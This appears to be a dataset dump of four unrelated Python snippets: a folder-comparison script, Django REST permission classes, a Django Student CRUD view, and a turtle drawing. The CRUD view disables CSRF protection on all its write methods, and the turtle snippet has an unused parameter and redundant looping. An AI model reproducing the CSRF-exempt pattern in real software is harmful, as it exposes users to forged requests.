# t100 = "C:\Users\Al\Videos\LinkMetric\7_Analysis_20171215\union_Grid_20170712_Eter_2014_Orgreg_20170718_N1655042445"
# t1000 = "C:\Users\Al\Videos\LinkMetric\7_Analysis_20171215\union_Eter_2014_Orgreg_20170718_Grid_20170712_P1640316176"
t50 = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069"
t100 = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Grid_20170712_Eter_2014_Orgreg_20170718_N1655042445"
t1000 = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Eter_2014_Orgreg_20170718_Grid_20170712_P1640316176"
app = "C:\Users\Al\Videos\LinkMetric\Test-2\\3_Analysis_20171229\union_Eter_2014_Orgreg_20170718_Grid_20170712_N1942436340"
U_ap_50 = "C:\Users\Al\Videos\LinkMetric\Test-2\3_Analysis_20171229\union_Grid_20170712_Eter_2014_Orgreg_20170718_P571882700"
# wr = codecs.open("C:\Users\Al\Videos\LinkMetric\\"
# "7_Analysis_20171220\union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069\\"
# "7_N2141339763\cluster_N2141339763_20171220.txt", "rb")
# text = wr.read()
# print text.__contains__("<http://www.grid.ac/institutes/grid.457417.4>")
# wr.close()
# print "DOE!"
# main folder
# Sub-Folders
# target folders
# Target file
# Comparison
track_3 = "<http://risis.eu/eter_2014/resource/HU0023>"
track_5 = "<http://www.grid.ac/institutes/grid.469502.c>"
# track(directory, "<http://risis.eu/eter_2014/resource/FR0088>")
# track(directory, "<http://www.grid.ac/institutes/grid.452199.2>")
folder_check(t50, t100)
folder_check(t50, t1000)
directory = "C:\Users\Al\Videos\LinkMetric\Test-1"
# folder_check(t50, app, True)
folder_check(app, t50)
folder_check(U_ap_50, t50)
track(directory, track_3)
print "DONE!!!" |
from rest_framework import permissions
class IsCreatorOrReadOnly(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.creator == request.user
# class CanUpdateOrDeleteCommit(permissions.BasePermission):
# def has_object_permission(self, request, view, obj):
# if request.method in permissions.SAFE_METHODS or request.method == 'POST':
# return True
# return obj.creator == request.user
class CanSeePost(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
following_user_list = request.user \
.following \
.filter(is_agree=True) \
.values_list('to_user', flat=True)
following_user_list = list(following_user_list) + [request.user.id]
return obj.creator.is_public or obj.creator_id in following_user_list
|
from django.shortcuts import render
from django.views.generic import View
from testapp.models import Student
from testapp.utils import is_json
from testapp.mixin import HttpResponseMixin, SerializeMixin
import json
from testapp.forms import StudentForm
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
# Create your views here.
@method_decorator(csrf_exempt, name='dispatch')
class StudentCRUDView(HttpResponseMixin,SerializeMixin,View):
def get_object_by_id(self,id):
try:
stu = Student.objects.get(id=id)
except Student.DoesNotExist:
stu = None
return stu
# Get Operations
def get(self, request,*args,**kwargs):
data = request.body
valid_json= is_json(data)
if not valid_json:
json_data = json.dumps({'msg':'Provide some valid json data'})
return self.render_to_http_response(json_data)
pdata = json.loads(data)
id = pdata.get('id',None)
if id is not None:
stu = self.get_object_by_id(id)
if stu is None:
json_data = json.dumps({'msg':'Given ID is Not Matched With exsiting record, Please Give some valid ID'})
return self.render_to_http_response(json_data)
json_data = self.serialize([stu,])
return self.render_to_http_response(json_data)
qs = Student.objects.all()
json_data = self.serialize(qs)
return self.render_to_http_response(json_data)
# Post Operations
def post(self, request, *args,**kwargs):
data = request.body
valid_json= is_json(data)
if not valid_json:
json_data = json.dumps({'msg':'Provide some valid json data'})
return self.render_to_http_response(json_data)
stu_data = json.loads(data)
form = StudentForm(stu_data)
if form.is_valid():
form.save(commit=True)
json_data = json.dumps({'msg':'Record created successfully'})
return self.render_to_http_response(json_data)
if form.errors:
json_data = json.dumps(form.errors)
return self.render_to_http_response(json_data)
# Update Operations
def put(self,request, *args,**kwargs):
data = request.body
valid_json= is_json(data)
if not valid_json:
json_data = json.dumps({'msg':'Provide some valid json data'})
return self.render_to_http_response(json_data)
provided_data = json.loads(data)
id = provided_data.get('id',None)
if id is None:
json_data = json.dumps({'msg':'ID is mandatory for Update Operation, please provide ID'})
return self.render_to_http_response(json_data)
stu = self.get_object_by_id(id)
if stu is None:
json_data = json.dumps({'msg':'Given ID is Not Matched With exsiting record, Please Give some valid ID'})
return self.render_to_http_response(json_data)
original_data ={
'name':stu.name,
'rollno':stu.rollno,
'mark':stu.mark,
'division':stu.division,
'addrs':stu.addrs,
}
original_data.update(provided_data)
form = StudentForm(original_data, instance=stu)
if form.is_valid():
form.save(commit=True)
json_data = json.dumps({'msg':'Record Updated successfully'})
return self.render_to_http_response(json_data)
if form.errors:
json_data = json.dumps(form.errors)
return self.render_to_http_response(json_data)
# Delete Operations
def delete(self, request, *args,**kwargs):
data = request.body
valid_json= is_json(data)
if not valid_json:
json_data = json.dumps({'msg':'Provide some valid json data'})
return self.render_to_http_response(json_data)
stu_data = json.loads(data)
id = stu_data.get('id',None)
if id is None:
json_data = json.dumps({'msg':'ID is mandatory for Deletion Operation, please provide ID'})
return self.render_to_http_response(json_data)
stu = self.get_object_by_id(id)
if stu is None:
json_data = json.dumps({'msg':'Given ID is Not Matched With exsiting record, Please Give some valid ID'})
return self.render_to_http_response(json_data)
status, delete_items = stu.delete()
if status == 1:
json_data = json.dumps({'msg':'Record Deleted successfully'})
return self.render_to_http_response(json_data)
json_data = json.dumps({'msg':'Unable to delete record.....please try again'})
return self.render_to_http_response(json_data)
|
import turtle
garis = turtle.Turtle()
def kotak(sudut,maju):
for i in range(4):
garis.forward(maju)
garis.right(90)
def lingkaran():
for i in range(360):
kotak(11,100)
lingkaran()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.